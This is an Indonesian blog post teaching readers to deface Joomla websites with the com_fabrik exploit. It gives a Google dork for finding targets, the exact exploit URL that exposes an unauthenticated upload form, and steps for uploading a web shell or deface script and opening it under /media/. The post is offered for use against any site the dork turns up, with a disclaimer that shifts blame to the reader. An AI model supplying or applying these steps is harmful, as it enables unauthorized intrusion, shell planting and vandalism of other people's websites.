Tutorial Deface Website Dengan Exploit Com_Fabrik


Gimana temen" kabarnya? pasti baik baik aja yakan.. hehe
oh iya, x ni w mo share tutorial Deface Website Menggunakan exploit Com_Fabrik
Exploit ini entah masih rame ato ga saya ndak tau gan, tapi dlu bnyak yg gunain..
Bug ini ada pada CMS Joomla. "CMS Joomla banyak bugnya ya aowkoakwoka", gak juga. WP juga banyak bugnya :v Ok langsung ae lah, ini poc gak ribet-ribet amat.

Dork :
inurl:viewTable?cid=

Exploit : 
- index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Langsung aja :

1. Dorking biasa di google ea.. Pas webnya dibuka bakal ada tulisan "Sorry this form is not publish".



2. Start Exploiting! Di belakang url sitenya tambahin exploit itu. Contoh : site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 . Ntar bakal muncul form upload.

3. Pilih shell/script deface lu, terus klik "Import CSV" buat upload. Kalo sukses bakal muncul kayak di gambar (yang gue kotakin).
 
4. Buat akses file/shell yang tadi lu upload di site.com/media/namafile.php . Karena ini site gak bisa upload shell jadi gue akses script deface yang gue upload ea.

Dah gitu doang, gampang kan gan :v 
Inget ini ya gan, dosa tanggung sendiri. Gue cuma share ilmu doang, kalo disalahgunain ini bukan urusan gw ya gan ,w cuma share tutor doang -_-

Tag Lainya :
1. Tutorial Deface Website Dengan Exploit Com Fabrik
2. Cara Deface Web Dengan Exploit Com_Fabrik
3. Cara Deface Website Dengan Exploit Com_Fabrik
4. Deface Metode Com_fabrik
5. Deface Dengan Exploit Com_Fabrik

0 Response to "Tutorial Deface Website Dengan Exploit Com_Fabrik"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel